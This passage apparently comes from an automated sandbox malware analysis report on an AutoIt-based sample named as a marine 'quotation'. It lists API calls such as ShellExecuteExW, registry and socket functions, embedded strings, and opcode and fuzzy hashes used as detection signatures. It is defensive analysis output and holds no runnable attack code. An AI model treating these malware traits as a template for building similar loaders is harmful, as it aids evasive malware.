                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                            • String ID:
                                                                            • API String ID: 272304278-0
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0069187F
                                                                            • UnloadUserProfile.USERENV(?,?), ref: 0069188B
                                                                            • CloseHandle.KERNEL32(?), ref: 00691894
                                                                            • CloseHandle.KERNEL32(?), ref: 0069189C
                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 006918A5
                                                                            • HeapFree.KERNEL32(00000000), ref: 006918AC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                            • String ID:
                                                                            • API String ID: 146765662-0
                                                                            • Opcode ID: 5d608b9ceba4c780e3d9c17948daa84e335c2087f3b2fd4ab92b7c3c9b822cda
                                                                            • Instruction ID: 52d2bbf725a907b2efd2ce45542b7242bd1ea9397fa8d6adee914378a3982bc8
                                                                            • Opcode Fuzzy Hash: 5d608b9ceba4c780e3d9c17948daa84e335c2087f3b2fd4ab92b7c3c9b822cda
                                                                            • Instruction Fuzzy Hash: CAE0C236404901BBDB015BA2ED0CD1ABB2AFB49B32B109220F229C1870CB329420EB60
                                                                            APIs
                                                                            • VariantInit.OLEAUT32(?), ref: 006B396B
                                                                            • CharUpperBuffW.USER32(?,?), ref: 006B3A7A
                                                                            • VariantClear.OLEAUT32(?), ref: 006B3C1F
                                                                              • Part of subcall function 006A0CDF: VariantInit.OLEAUT32(00000000), ref: 006A0D1F
                                                                              • Part of subcall function 006A0CDF: VariantCopy.OLEAUT32(?,?), ref: 006A0D28
                                                                              • Part of subcall function 006A0CDF: VariantClear.OLEAUT32(?), ref: 006A0D34
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                            • API String ID: 4237274167-1221869570
                                                                            • Opcode ID: d965696b4f4e70d3af3293353f7b0b983f95dd65241cf03451f842fdab2500c4
                                                                            • Instruction ID: 4808ae7f76a45ae96a9aa83dc45fcfd663313c71765ac1081adfd55eaabefc5d
                                                                            • Opcode Fuzzy Hash: d965696b4f4e70d3af3293353f7b0b983f95dd65241cf03451f842fdab2500c4
                                                                            • Instruction Fuzzy Hash: 03917AB56083159FC744DF24C4809AAB7E6FF89314F14882DF8899B351DB30EE46CB96
                                                                            APIs
                                                                              • Part of subcall function 0069000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0068FF41,80070057,?,?,?,0069035E), ref: 0069002B
                                                                              • Part of subcall function 0069000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0068FF41,80070057,?,?), ref: 00690046
                                                                              • Part of subcall function 0069000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0068FF41,80070057,?,?), ref: 00690054
                                                                              • Part of subcall function 0069000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0068FF41,80070057,?), ref: 00690064
                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 006B4C51
                                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 006B4DCF
                                                                            • CoTaskMemFree.OLE32(?), ref: 006B4DDA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: FreeFromProgTask$CreateInitializeInstanceSecuritylstrcmpi
                                                                            • String ID: NULL Pointer assignment
                                                                            • API String ID: 4175897753-2785691316
                                                                            • Opcode ID: 353df73baf4130d8d84d1eac04942656e8986e75d805be9d01aa8c81185e83ac
                                                                            • Instruction ID: 560c67757f96a1987494aa5c114bfce5be14cb2e980ddda0b2465b1a028bc288
                                                                            • Opcode Fuzzy Hash: 353df73baf4130d8d84d1eac04942656e8986e75d805be9d01aa8c81185e83ac
                                                                            • Instruction Fuzzy Hash: 849108B1D0021DAFDF14DFA4C891EEEBBBABF08310F104569E915A7251DB709A45CFA0
                                                                            APIs
                                                                            • CharLowerBuffW.USER32(?,?,00000000,?), ref: 006B8CF3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharLower
                                                                            • String ID: cdecl$none$stdcall$winapi
                                                                            • API String ID: 2358735015-567219261
                                                                            • Opcode ID: 1cd90c915bb1b67269219e239ef034ada49def6830d95d66a1fed82434a1b27a
                                                                            • Instruction ID: d24cf44c6e5d9b451d1a91d18fbbe277e57d381706052fafb749c6abb5329a8b
                                                                            • Opcode Fuzzy Hash: 1cd90c915bb1b67269219e239ef034ada49def6830d95d66a1fed82434a1b27a
                                                                            • Instruction Fuzzy Hash: EF5180B1A041169FCB14DF68C9519FEB7ABAF64324B204229E826E7385DB30DD81CBD0
                                                                            APIs
                                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 006BAEA3
                                                                            • GetProcessId.KERNEL32(00000000), ref: 006BAF38
                                                                            • CloseHandle.KERNEL32(00000000), ref: 006BAF67
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CloseExecuteHandleProcessShell
                                                                            • String ID: <$@
                                                                            • API String ID: 1279613386-1426351568
                                                                            • Opcode ID: d62d0735b61ada89191d43ba765424c2c22707097463707079a2125271948008
                                                                            • Instruction ID: 66c3180b962e26fe50efd90d33ff5f7bb5ad55639e633ca268ffe27dd56965a6
                                                                            • Opcode Fuzzy Hash: d62d0735b61ada89191d43ba765424c2c22707097463707079a2125271948008
                                                                            • Instruction Fuzzy Hash: D67168B1A00619DFCB14DF94C484A9EBBF2BF08310F04849DE856AB362CB75ED85CB95
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(?,?), ref: 0069B5FC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharUpper
                                                                            • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                            • API String ID: 3964851224-769500911
                                                                            • Opcode ID: 7cbc884e18f77e45905497da1278124d50ddd016476e84ee6256c472e9406c1c
                                                                            • Instruction ID: b5daca5d8228c380b7aa1f0dd51154e1ba2d69bbd354330c94cc6f2a03d3bd0b
                                                                            • Opcode Fuzzy Hash: 7cbc884e18f77e45905497da1278124d50ddd016476e84ee6256c472e9406c1c
                                                                            • Instruction Fuzzy Hash: 9241F832A000269BCF106F7DDE905FE7BABAFA1754B245229E421DB784E731ED81C790
                                                                            APIs
                                                                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00697206
                                                                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0069723C
                                                                            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0069724D
                                                                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 006972CF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$AddressCreateInstanceProc
                                                                            • String ID: DllGetClassObject
                                                                            • API String ID: 753597075-1075368562
                                                                            • Opcode ID: 0c3bc331a6105f36d0c694b402ea4dc780510cff346b17d9f11db257aa0ebde6
                                                                            • Instruction ID: 4cd26c8b32087e9b193c6646c5f30a94cd99158c0e9e38bd41f08aa237d634de
                                                                            • Opcode Fuzzy Hash: 0c3bc331a6105f36d0c694b402ea4dc780510cff346b17d9f11db257aa0ebde6
                                                                            • Instruction Fuzzy Hash: 35415071624204DFDF15CF54C884AAA7BAEEF44710F1580AEFD059F60AD7B1DA45CBA0
                                                                            APIs
                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006C3E35
                                                                            • IsMenu.USER32(?), ref: 006C3E4A
                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 006C3E92
                                                                            • DrawMenuBar.USER32 ref: 006C3EA5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Item$DrawInfoInsert
                                                                            • String ID: 0
                                                                            • API String ID: 3076010158-4108050209
                                                                            • Opcode ID: bb8ff13b504074f6c8578c2cf0bbb934bf561a9a054455e002b24f879c0f6284
                                                                            • Instruction ID: 9dee71c912b263ac9a2af47afd5c9ae5a975eecd0bc74769b1946efcbc93be03
                                                                            • Opcode Fuzzy Hash: bb8ff13b504074f6c8578c2cf0bbb934bf561a9a054455e002b24f879c0f6284
                                                                            • Instruction Fuzzy Hash: 51413675A00219EFDB10DF50D884EEABBBAFF49364F04816EE905A7350D730AE55CBA0
                                                                            APIs
                                                                              • Part of subcall function 00693CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00693CCA
                                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00691E66
                                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00691E79
                                                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 00691EA9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$ClassName
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 787153527-1403004172
                                                                            • Opcode ID: 21e00dfe6b573b271531748ad26f126cdf42d8a8aed7d03ecdbd9245c27d1f05
                                                                            • Instruction ID: 8248cf6d09054c5d7a1f1116d797c65019e0748587fa4bbecdaf7a6e5d5c924a
                                                                            • Opcode Fuzzy Hash: 21e00dfe6b573b271531748ad26f126cdf42d8a8aed7d03ecdbd9245c27d1f05
                                                                            • Instruction Fuzzy Hash: EC212671A00104BADF149B60CC45CFFBBBFDF42360F20411DF815A76E0DB7449068A60
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 006C2F8D
                                                                            • LoadLibraryW.KERNEL32(?), ref: 006C2F94
                                                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 006C2FA9
                                                                            • DestroyWindow.USER32(?), ref: 006C2FB1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                            • String ID: SysAnimate32
                                                                            • API String ID: 3529120543-1011021900
                                                                            APIs
                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00654D1E,006628E9,?,00654CBE,006628E9,006F88B8,0000000C,00654E15,006628E9,00000002), ref: 00654D8D
                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00654DA0
                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00654D1E,006628E9,?,00654CBE,006628E9,006F88B8,0000000C,00654E15,006628E9,00000002,00000000), ref: 00654DC3
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                            • API String ID: 4061214504-1276376045
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00634EDD,?,00701418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00634E9C
                                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00634EAE
                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00634EDD,?,00701418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00634EC0
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                            • API String ID: 145871493-3689287502
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00673CDE,?,00701418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00634E62
                                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00634E74
                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00673CDE,?,00701418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00634E87
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                            • API String ID: 145871493-1355242751
                                                                            APIs
                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 006A2C05
                                                                            • DeleteFileW.KERNEL32(?), ref: 006A2C87
                                                                            • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 006A2C9D
                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 006A2CAE
                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 006A2CC0
                                                                            Similarity
                                                                            • API ID: File$Delete$Copy
                                                                            • String ID:
                                                                            • API String ID: 3226157194-0
                                                                            APIs
                                                                            • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 006B1DC0
                                                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 006B1DE1
                                                                            • WSAGetLastError.WSOCK32 ref: 006B1DF2
                                                                            • inet_ntoa.WSOCK32(?), ref: 006B1E8C
                                                                              • Part of subcall function 006B3224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,006AEC0C), ref: 006B3240
                                                                            • htons.WSOCK32(?,?,?,?,?), ref: 006B1EDB
                                                                            Similarity
                                                                            • API ID: ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                            • String ID:
                                                                            • API String ID: 3163710072-0
                                                                            APIs
                                                                            • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,006717FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 006715CE
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,006717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00671651
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,006717FB,?,006717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 006716E4
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,006717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 006716FB
                                                                              • Part of subcall function 00663820: RtlAllocateHeap.NTDLL(00000000,?,00701444,?,0064FDF5,?,?,0063A976,00000010,00701440,006313FC,?,006313C6,?,00631129), ref: 00663852
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,006717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00671777
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$AllocateHeapInfo
                                                                            • String ID:
                                                                            • API String ID: 1443698708-0
                                                                            APIs
                                                                            • GetCurrentProcessId.KERNEL32 ref: 006BA427
                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 006BA435
                                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 006BA468
                                                                            • CloseHandle.KERNEL32(?), ref: 006BA63D
                                                                            Similarity
                                                                            • API ID: Process$CloseCountersCurrentHandleOpen
                                                                            • String ID:
                                                                            • API String ID: 3488606520-0
                                                                            APIs
                                                                              • Part of subcall function 006BC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,006BB6AE,?,?), ref: 006BC9B5
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006BBAA5
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006BBB00
                                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 006BBB63
                                                                            • RegCloseKey.ADVAPI32(?,?), ref: 006BBBA6
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 006BBBB3
                                                                            Similarity
                                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                            • String ID:
                                                                            • API String ID: 3740051246-0
                                                                            APIs
                                                                            • VariantInit.OLEAUT32(?), ref: 00698BCD
                                                                            • VariantClear.OLEAUT32 ref: 00698C3E
                                                                            • VariantClear.OLEAUT32 ref: 00698C9D
                                                                            • VariantClear.OLEAUT32(?), ref: 00698D10
                                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00698D3B
                                                                            Similarity
                                                                            • API ID: Variant$Clear$ChangeInitType
                                                                            • String ID:
                                                                            • API String ID: 4136290138-0
                                                                            APIs
                                                                            • GetConsoleCP.KERNEL32(00673CD6,?,?,?,?,?,?,?,?,00665BA3,?,?,00673CD6,?,?), ref: 00665470
                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00673CD6,00000005,00000000,00000000), ref: 0066552C
                                                                            • WriteFile.KERNEL32(?,00673CD6,00000000,00665BA3,00000000,?,?,?,?,?,?,?,?,?,00665BA3,?), ref: 0066554B
                                                                            • WriteFile.KERNEL32(?,?,00000001,00665BA3,00000000,?,?,?,?,?,?,?,?,?,00665BA3,?), ref: 00665584
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Similarity
                                                                            • API ID: FileWrite$ByteCharConsoleMultiWide
                                                                            • String ID:
                                                                            • API String ID: 977765425-0
                                                                            • Opcode ID: 50a0c581095cb575df0d23125b02ea1868adacdefcf7af8a8bb9ea551f9b6bd5
                                                                            • Instruction ID: dec3dd0436dcbab47e344bef4bfa9b47e8292357864890b547592ed99d1c1830
                                                                            • Opcode Fuzzy Hash: 50a0c581095cb575df0d23125b02ea1868adacdefcf7af8a8bb9ea551f9b6bd5
                                                                            • Instruction Fuzzy Hash: 4B51A3B1A006499FDB10CFA8D846AEEBBFAEF09310F14415EF556E7291D730AA41CB64
                                                                            APIs
                                                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 006A8BAE
                                                                            • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 006A8BDA
                                                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 006A8C32
                                                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 006A8C57
                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 006A8C5F
                                                                            Similarity
                                                                            • API ID: PrivateProfile$SectionWrite$String
                                                                            • String ID:
                                                                            • API String ID: 2832842796-0
                                                                            • Opcode ID: 52d8282b83a4257cfe4969cb9c507653d2086a2cc9148428fd7adb51a92ccd96
                                                                            • Instruction ID: 0245341e486b5ace1d32e10aff3e61bd4b919025233954a6ee17012b0f185b5f
                                                                            • Opcode Fuzzy Hash: 52d8282b83a4257cfe4969cb9c507653d2086a2cc9148428fd7adb51a92ccd96
                                                                            • Instruction Fuzzy Hash: E3515E75A002189FCB14DF65C880E69BBF6FF49324F088458E84AAB362CB35ED51CF94
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(?,00000000,?), ref: 006B8F40
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 006B8FD0
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 006B8FEC
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 006B9032
                                                                            • FreeLibrary.KERNEL32(00000000), ref: 006B9052
                                                                              • Part of subcall function 0064F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,006A1043,?,7746E610), ref: 0064F6E6
                                                                              • Part of subcall function 0064F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0068FA64,00000000,00000000,?,?,006A1043,?,7746E610,?,0068FA64), ref: 0064F70D
                                                                            Similarity
                                                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                            • String ID:
                                                                            • API String ID: 666041331-0
                                                                            • Opcode ID: e640120a13c63dae7b4f6eeca3e963c193a2801ef79c4ed68f34a5715d635910
                                                                            • Instruction ID: 43f7e8b232f797251628c9c805de59b81290f9d28e7dceace772752dab938565
                                                                            • Opcode Fuzzy Hash: e640120a13c63dae7b4f6eeca3e963c193a2801ef79c4ed68f34a5715d635910
